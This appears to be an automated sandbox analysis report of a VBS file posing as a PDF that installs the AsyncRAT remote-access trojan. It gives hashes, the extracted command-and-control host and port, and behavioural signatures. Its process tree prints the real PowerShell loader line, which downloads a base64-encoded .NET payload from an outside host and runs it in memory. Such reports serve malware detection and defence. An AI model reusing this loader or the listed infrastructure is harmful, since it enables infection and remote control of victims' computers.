Analysis
-
max time kernel
92s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
22/09/2022, 17:17
Static task
static1
Behavioral task
behavioral1
Sample
TWEASOPKSA_002_PDF.vbs
Resource
win7-20220901-en
General
-
Target
TWEASOPKSA_002_PDF.vbs
-
Size
238KB
-
MD5
b757fcf7a0df8528178bf586a3d718ae
-
SHA1
65394437dbbc8405b0a4b5c5e87bd1668f644d09
-
SHA256
84f101fd1efbadf4f287849ae8dc6f09729f1741143b7465a4233599b9865624
-
SHA512
908a583130bec368503d3a5ca62b7432d45910bc9adabd96da5310e38d5691a2c9bb9f71114c8a1270bf133d5324dec0afa819817fc85768d6c5cecaa9340119
-
SSDEEP
48:sK0mjzlXJj5NzzBWsoMtssbs0Qs+PM/sq6OkZ9s3XEHDzzAA:sKDF9n0JMtswebE0DAsDoA
Malware Config
Extracted
https://contadoreshbc.com/dll_startup
Extracted
asyncrat
0.5.7B
Default
ehjay2022.duckdns.org:6739
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 2 IoCs
resource yara_rule behavioral2/memory/4316-138-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral2/memory/4316-139-0x000000000040C73E-mapping.dmp asyncrat -
Blocklisted process makes network request 3 IoCs
flow pid Process 5 520 powershell.exe 14 520 powershell.exe 18 520 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 520 set thread context of 4316 520 powershell.exe 88 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 520 powershell.exe 520 powershell.exe 4948 powershell.exe 4948 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 520 powershell.exe Token: SeDebugPrivilege 4948 powershell.exe Token: SeDebugPrivilege 4316 RegAsm.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4648 wrote to memory of 520 4648 WScript.exe 80 PID 4648 wrote to memory of 520 4648 WScript.exe 80 PID 520 wrote to memory of 4948 520 powershell.exe 85 PID 520 wrote to memory of 4948 520 powershell.exe 85 PID 520 wrote to memory of 4316 520 powershell.exe 88 PID 520 wrote to memory of 4316 520 powershell.exe 88 PID 520 wrote to memory of 4316 520 powershell.exe 88 PID 520 wrote to memory of 4316 520 powershell.exe 88 PID 520 wrote to memory of 4316 520 powershell.exe 88 PID 520 wrote to memory of 4316 520 powershell.exe 88 PID 520 wrote to memory of 4316 520 powershell.exe 88 PID 520 wrote to memory of 4316 520 powershell.exe 88
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TWEASOPKSA_002_PDF.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('https://contadoreshbc.com/dll_startup'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('88b1f890dee4-f24b-d954-356b-7478a862=nekot&aidem=tla?txt.FDP_200_ASKPOSAEWT/o/moc.topsppa.b3638-fhwen/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Done.vbs3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4948
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4316
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD524cd57a8710ead89af77751cc4ce3236
SHA1d66a76341ec9d1f53adc3caedfbc2a78e1055a30
SHA256ca494d00a7aba63fc4cf7c49316bccee057616a26b917f9f12692b36b1f1dd91
SHA512903577e4d3cd91d47dbd9f4f49c48236aef013c12ed36dc8a338c23845680b709af7e5272c21f036ea88c7b6ca10d090eb2cede1d836557d8ea37d071358223f
-
Filesize
1KB
MD50305a7668f2e3675e1e22d509f88ed5a
SHA195bc70dc1ae5c795fcc4f9581de41ef4f83e0b4d
SHA2569ab67c9ef2f57eaff6903d45c295716412ab4f87f656034c33389c648c89582d
SHA51232155e5a7bb2a4faebf504eb399799765173671d9097c2e61bc789e1852235013de7f9efbfc107b686e21d0af01dca22083a5f3a8c477323eda7456daf209743